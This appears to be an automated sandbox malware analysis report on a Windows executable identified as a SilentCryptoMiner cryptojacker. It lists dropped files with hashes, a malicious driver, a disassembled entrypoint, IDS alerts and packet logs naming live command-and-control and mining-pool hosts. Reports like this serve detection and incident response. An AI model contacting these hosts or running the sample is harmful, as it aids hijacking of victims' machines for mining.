                                                                              SHA1:0D6C33AC1CF9CF3EDB3B4632A0943BC7ED7521FC
                                                                              SHA-256:3946831B472B0248BBBB225A2253A26A693E9155C3FFF0D8CE29897E07573134
                                                                              SHA-512:0306DB2CBFEB878570FF4B4342CD6E89B056D9FE7E41029CE17FD08953749351EB65C8B942D36EB7842F6167219997D876270DC0B5528F4FFC13EB310B8F0324
                                                                              Malicious:false
                                                                              Preview:ElfChnk........."..............."...........`8...9....H4......................................................................4.................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v...........................................................................&*..........**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.328278185990426
                                                                              Encrypted:false
                                                                              SSDEEP:384:Kh4BwBxNqObx1rBwBwQtBwBnp+/0JBwBc/wBwBwtBwBwfBwBAsmBwBkBwB2mBwBU:K/NqObx/gs3uWQfcjDsM
                                                                              MD5:55B1F2AB9BC716BAE0B9ACED1620227A
                                                                              SHA1:250594A8BF97340574AE1F4E051AA88A05795001
                                                                              SHA-256:972AF48177FCEE32DFE0881E0E8D7B0F333859D1B678FDCE0895A9A4E9999E93
                                                                              SHA-512:7932CF638871AB0E78E73C0A47F767768F4B37EBB6DDDAC4344F2391E7B2831EB696AA5B03BCA4939583FA759247C67214FECCC8E5FC54656CD2F3032042D17F
                                                                              Malicious:false
                                                                              Preview:ElfChnk.....................................X....1...f@k.....................................................................i..............................................=...........................................................................................................................f...............?...........................m...................M...F....................#......i...........................................................................................................&...........**..H..............A..........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.396202402379334
                                                                              Encrypted:false
                                                                              SSDEEP:384:IMh4UEiUEfUE5UE0UEfUEtUEpUEAUELUEvUEcUEJUEBUE3UEHUERUExUEeUEaUEW:voHgSNX8+BoUYUkIO
                                                                              MD5:838CCFDA7EEB847C3F96507592B3480B
                                                                              SHA1:1D1C0CA6AFCCC861AFB6B7D2BD500657CC139AC7
                                                                              SHA-256:2E474ECD1D96758EA0BD52D3C594998DFC30DCB83270638B107B41B81FB51339
                                                                              SHA-512:59156BC3267CABA12BB8F542EF10E409F0E685731E8C916681457C9376B36A84DB13B29F006C049528E1E78D63168B9C4B521088FB08445F208432BBDC0EC749
                                                                              Malicious:false
                                                                              Preview:ElfChnk.....................................0)...*..N..,.....................................................................i..................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..............4.............F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\Security.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):68128
                                                                              Entropy (8bit):4.232360734435093
                                                                              Encrypted:false
                                                                              SSDEEP:384:8FR8FRqtM4c60zCwy/EowMt7uS+owMt9UQwowMtbGowMtkoNCaoQlowMtjnXyoAz:KY20DyPUW398Q4D2W
                                                                              MD5:EA22CE163818CE3BA8D689D88FEDCB00
                                                                              SHA1:5F81F95AB616CFE0B8A68E667D23A4649F9C67FF
                                                                              SHA-256:1D282E289A0FCB7AD1D1794383CD4ECDD392BF2D0EBC2E0217A7283A5A1DF2E5
                                                                              SHA-512:D579AAF6DDF57EC12D17FAE9CB14A8DB90383215AFCD0E6EB7BBA590E7EF2D9978858C817404AC4737E611C6838BDA82BCF27DF47803A10C076F439C93837E16
                                                                              Malicious:false
                                                                              Preview:ElfChnk.................b.......b............... ....v:.............................................................................................s...h...............N...=...................................................N...............................................w.......6......................./...................................]...........).......M...T...:.......................................................................................&.......................................................**.. ...b...........^........0.;M&.......0.;M.j.Y)..G2.zA.......A..5...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....^...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

                                                                              C:\Windows\System32\winevt\Logs\Setup.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):68440
                                                                              Entropy (8bit):0.4795448049634197
                                                                              Encrypted:false
                                                                              SSDEEP:96:mNVaO8JoQ8SRO2U8w527NVaO8JoQ8SRO2U8w52:wV7C1RCGV7C1RC
                                                                              MD5:A198F199AB4A57021AF846544EDB727D
                                                                              SHA1:85B9BACD0A7AECC007094C2FE2704E63FB89D161
                                                                              SHA-256:A1DBA1EA76262BA6ABEE0EF1D55836625B556C5D4BF8C44F902395E8520D8F06
                                                                              SHA-512:83DBCB5CA0165D5B1292B9D6C1A9C5BC0169120B633F4ECC8590B2ECA8866F24A9C28A09BFCDA3C51BF6238B67D5C0DE6EA0A9F1DA03A71B57CC48B60A2FD546
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........................................X...v.|..................................................................... ...............................................=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..............8...^........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                              C:\Windows\System32\winevt\Logs\System.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):88720
                                                                              Entropy (8bit):4.494679090281514
                                                                              Encrypted:false
                                                                              SSDEEP:768:ykt1rIgd+gkt1rIgd+CVGg5OwELSTFxCydU5vDXkt1rIgd+MX:fSgd+VSgd+A/1MgSgd+MX
                                                                              MD5:D8BBC036B9CCFBC92B1247DD36815BAC
                                                                              SHA1:3578CC64F16C4F32AAD280EAF9190FE78306511E
                                                                              SHA-256:6594DB9C26D145A889CE4E57BD810F8F0D031832BA114093B36D61EED57B995B
                                                                              SHA-512:1E43C0CAF9133BC2C0806A76F63A74FF3B4336D45E5D30F3811873AC0773CCF87AB502E7ECEB57C99CB280FE33C9803AC08AA51707A711F2B083C4F5534C8FA6
                                                                              Malicious:false
                                                                              Preview:ElfChnk......................................*...+...s.l....................................................................m.u................R...s...h...............z...=...................................................N...............................a....'..........w.......2.......................G...................................Y...........).......M...5...:...................................&....................................................................... ...!'..+...............&...........**..@...............^...........l&..........l...R...`....=.......A..1...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....Z...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

                                                                              C:\Windows\System32\winevt\Logs\Windows PowerShell.evtx

                                                                              Download File
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):86776
                                                                              Entropy (8bit):3.836153912474342
                                                                              Encrypted:false
                                                                              SSDEEP:1536:tFwdontl3EJ5Xs3g3Fwdontl3EJ5Xs3gpCssVtILMmYirZOZ2c1R0uXbiwO9X:
                                                                              MD5:A96D24D9E3002B91A5C274F24215C5A0
                                                                              SHA1:BE4A0421AF4529A17E8F316478D143F67475D327
                                                                              SHA-256:6B22CFBCAE880A6625E329513B4F59F646958256A96DE41D8A5EB79A94FC892A
                                                                              SHA-512:E4A91A425C0B133AC46E0D4F2E45CF3C7086F5EBC654DBAFB3A1A262523C9411E4A60186157D5E5A8B6EBE1DA915DB392C786F98800EF8F6CDE4A543AC88A630
                                                                              Malicious:false
                                                                              Preview:ElfChnk.................i.......x............M...R..........................................................................0.C............................................=..........................................................................................................................._...............8...........................f...................M...c...........................p...................................&...................................................................................**......i............^........}k..&.......}k.....R.H............A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............

                                                                              C:\Windows\Temp\__PSScriptPolicyTest_dj2wu4l4.iio.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Windows\Temp\__PSScriptPolicyTest_fepegvz2.dyp.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Windows\Temp\__PSScriptPolicyTest_qekbdbcu.ayg.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Windows\Temp\__PSScriptPolicyTest_vard1gga.4fg.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Windows\Temp\ftnvuqwjtdwb.sys

                                                                              Download File
                                                                              Process:C:\ProgramData\IGaming\driver.exe
                                                                              File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):14544
                                                                              Entropy (8bit):6.2660301556221185
                                                                              Encrypted:false
                                                                              SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                              MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                              SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                              SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                              SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                                              Joe Sandbox View:
                                                                              • Filename: hiwA7Blv7C.exe, Detection: malicious, Browse
                                                                              • Filename: 5fr5gthkjdg71.exe, Detection: malicious, Browse
                                                                              • Filename: aAcx14Rjtw.exe, Detection: malicious, Browse
                                                                              • Filename: SharcHack.exe, Detection: malicious, Browse
                                                                              • Filename: 0Ty.png.exe, Detection: malicious, Browse
                                                                              • Filename: Qhx6a6VLAH.exe, Detection: malicious, Browse
                                                                              • Filename: 88aext0k.exe, Detection: malicious, Browse
                                                                              • Filename: gaozw40v.exe, Detection: malicious, Browse
                                                                              • Filename: c2.exe, Detection: malicious, Browse
                                                                              • Filename: ldr.ps1, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                              Entropy (8bit):6.540079343872506
                                                                              TrID:
                                                                              • Win64 Executable GUI (202006/5) 92.65%
                                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                                              • DOS Executable Generic (2002/1) 0.92%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:file.exe
                                                                              File size:2'867'712 bytes
                                                                              MD5:a03484846e3418ffa2ab8aec97a03e88
                                                                              SHA1:54c62c97db8b0234eeb7a03d66b73f9d1dc22614
                                                                              SHA256:6932616523c8080fd908d4b776f416a4d32653e657c2cbe75a42cdc0a8b5c4d1
                                                                              SHA512:0f1661dd055e34ca4c8f37bccf1aee739be12a1c6836c0af00c0c156e59e363ce0c59f4b0e1402d4367a3d9e3babc00aa5c7e512579f9295942150539103ba8f
                                                                              SSDEEP:49152:U7N5o20VC8FlpAi4y/8t6x4EBka+Okl5lo5V5i7b6LR7QY6Vtnah:c2VCkxp8t69kBOtVebk6q
                                                                              TLSH:0BD523FF7B46431CC798007F1FA869D57118FFE81B202AC781B56BDC0E616A89AB54D2
                                                                              File Content Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d.....?g.........."......z...D+.....@..........@............................. ,...........`........................................

                                                                              File Icon

                                                                              Icon Hash:00928e8e8686b000

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x140001140
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x140000000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0x673FA31D [Thu Nov 21 21:16:13 2024 UTC]
                                                                              TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:6
                                                                              OS Version Minor:0
                                                                              File Version Major:6
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:6
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:de41d4e0545d977de6ca665131bb479a

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              dec eax
                                                                              sub esp, 28h
                                                                              dec eax
                                                                              mov eax, dword ptr [00007ED5h]
                                                                              mov dword ptr [eax], 00000001h
                                                                              call 00007FA944D9918Fh
                                                                              nop
                                                                              nop
                                                                              nop
                                                                              dec eax
                                                                              add esp, 28h
                                                                              ret
                                                                              nop
                                                                              inc ecx
                                                                              push edi
                                                                              inc ecx
                                                                              push esi
                                                                              push esi
                                                                              push edi
                                                                              push ebx
                                                                              dec eax
                                                                              sub esp, 20h
                                                                              dec eax
                                                                              mov eax, dword ptr [00000030h]
                                                                              dec eax
                                                                              mov edi, dword ptr [eax+08h]
                                                                              dec eax
                                                                              mov esi, dword ptr [00007EC9h]
                                                                              xor eax, eax
                                                                              dec eax
                                                                              cmpxchg dword ptr [esi], edi
                                                                              sete bl
                                                                              je 00007FA944D991B0h
                                                                              dec eax
                                                                              cmp edi, eax
                                                                              je 00007FA944D991ABh
                                                                              dec esp
                                                                              mov esi, dword ptr [000096F1h]
                                                                              nop word ptr [eax+eax+00000000h]
                                                                              mov ecx, 000003E8h
                                                                              inc ecx
                                                                              call esi
                                                                              xor eax, eax
                                                                              dec eax
                                                                              cmpxchg dword ptr [esi], edi
                                                                              sete bl
                                                                              je 00007FA944D99187h
                                                                              dec eax
                                                                              cmp edi, eax
                                                                              jne 00007FA944D99169h
                                                                              dec eax
                                                                              mov edi, dword ptr [00007E90h]
                                                                              mov eax, dword ptr [edi]
                                                                              cmp eax, 01h
                                                                              jne 00007FA944D9918Eh
                                                                              mov ecx, 0000001Fh
                                                                              call 00007FA944DA0684h
                                                                              jmp 00007FA944D991A9h
                                                                              cmp dword ptr [edi], 00000000h
                                                                              je 00007FA944D9918Bh
                                                                              mov byte ptr [002BBA71h], 00000001h
                                                                              jmp 00007FA944D9919Bh
                                                                              mov dword ptr [edi], 00000001h
                                                                              dec eax
                                                                              mov ecx, dword ptr [00007E7Ah]
                                                                              dec eax
                                                                              mov edx, dword ptr [00007E7Bh]
                                                                              call 00007FA944DA067Bh
                                                                              mov eax, dword ptr [edi]
                                                                              cmp eax, 01h
                                                                              jne 00007FA944D9919Bh
                                                                              dec eax
                                                                              mov ecx, dword ptr [00007E50h]

                                                                              Data Directories

                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xa5c00x3c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2be0000x180.pdata
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x2c10000x78.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x90a00x28.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x94100x138.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0xa7580x158.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                              Sections

                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x78560x7a00f826ece2ce317d4412103755c5d3f85aFalse0.505219006147541data6.1867285974059225IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x90000x1d080x1e001650b9e0ce371324080fb99c31494d5fFalse0.4513020833333333zlib compressed data4.668045049109493IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0xb0000x2b2bc00x2b1e004fcfbe815dfea54f25a0e6ca347f2347unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .pdata0x2be0000x1800x20000ec0f04901c8f887a68a550cc9ebeedFalse0.501953125data3.124907916476298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .00cfg0x2bf0000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .tls0x2c00000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .reloc0x2c10000x780x200310a6f420496237ff7a209835e359952False0.232421875data1.425957514287425IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                              Imports

                                                                              DLLImport
                                                                              msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
                                                                              KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery

                                                                              Network Behavior

                                                                              Suricata IDS Alerts

                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2025-01-04T22:58:02.999130+01002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.2.55708983.217.209.23580TCP
                                                                              2025-01-04T22:58:02.999130+01002826930ETPRO COINMINER XMR CoinMiner Usage2192.168.2.549704141.94.96.1448080TCP
                                                                              2025-01-04T22:58:13.875308+01002047928ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com)2192.168.2.5596741.1.1.153UDP
                                                                              2025-01-04T22:58:19.921055+01002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.2.54970583.217.209.23580TCP
                                                                              2025-01-04T22:59:18.545663+01002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.2.55708783.217.209.23580TCP

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 4, 2025 22:58:13.898458004 CET497048080192.168.2.5141.94.96.144
                                                                              Jan 4, 2025 22:58:13.903283119 CET808049704141.94.96.144192.168.2.5
                                                                              Jan 4, 2025 22:58:13.903477907 CET497048080192.168.2.5141.94.96.144
                                                                              Jan 4, 2025 22:58:13.903613091 CET497048080192.168.2.5141.94.96.144
                                                                              Jan 4, 2025 22:58:13.908379078 CET808049704141.94.96.144192.168.2.5
                                                                              Jan 4, 2025 22:58:14.566293001 CET808049704141.94.96.144192.168.2.5
                                                                              Jan 4, 2025 22:58:14.608273029 CET497048080192.168.2.5141.94.96.144
                                                                              Jan 4, 2025 22:58:14.922724962 CET4970580192.168.2.583.217.209.235
                                                                              Jan 4, 2025 22:58:14.928738117 CET804970583.217.209.235192.168.2.5
                                                                              Jan 4, 2025 22:58:14.929078102 CET4970580192.168.2.583.217.209.235
                                                                              Jan 4, 2025 22:58:14.929846048 CET4970580192.168.2.583.217.209.235
                                                                              Jan 4, 2025 22:58:14.935733080 CET804970583.217.209.235192.168.2.5
                                                                              Jan 4, 2025 22:58:14.935831070 CET4970580192.168.2.583.217.209.235
                                                                              Jan 4, 2025 22:58:14.940949917 CET804970583.217.209.235192.168.2.5
                                                                              Jan 4, 2025 22:58:17.393083096 CET808049704141.94.96.144192.168.2.5
                                                                              Jan 4, 2025 22:58:17.530122995 CET497048080192.168.2.5141.94.96.144
                                                                              Jan 4, 2025 22:58:19.921055079 CET4970580192.168.2.583.217.209.235
                                                                              Jan 4, 2025 22:58:19.967566013 CET804970583.217.209.235192.168.2.5
                                                                              Jan 4, 2025 22:58:33.322398901 CET808049704141.94.96.144192.168.2.5
                                                                              Jan 4, 2025 22:58:33.436394930 CET497048080192.168.2.5141.94.96.144
                                                                              Jan 4, 2025 22:58:36.326061010 CET804970583.217.209.235192.168.2.5
                                                                              Jan 4, 2025 22:58:36.326144934 CET4970580192.168.2.583.217.209.235
                                                                              Jan 4, 2025 22:58:39.397537947 CET5692153192.168.2.5162.159.36.2
                                                                              Jan 4, 2025 22:58:39.402365923 CET5356921162.159.36.2192.168.2.5
                                                                              Jan 4, 2025 22:58:39.404978991 CET5692153192.168.2.5162.159.36.2
                                                                              Jan 4, 2025 22:58:39.409796953 CET5356921162.159.36.2192.168.2.5
                                                                              Jan 4, 2025 22:58:39.877607107 CET5692153192.168.2.5162.159.36.2
                                                                              Jan 4, 2025 22:58:39.882504940 CET5356921162.159.36.2192.168.2.5
                                                                              Jan 4, 2025 22:58:39.882581949 CET5692153192.168.2.5162.159.36.2
                                                                              Jan 4, 2025 22:58:45.340709925 CET808049704141.94.96.144192.168.2.5
                                                                              Jan 4, 2025 22:58:45.389332056 CET497048080192.168.2.5141.94.96.144
                                                                              Jan 4, 2025 22:59:10.820964098 CET808049704141.94.96.144192.168.2.5
                                                                              Jan 4, 2025 22:59:11.045610905 CET497048080192.168.2.5141.94.96.144
                                                                              Jan 4, 2025 22:59:13.515332937 CET5708780192.168.2.583.217.209.235
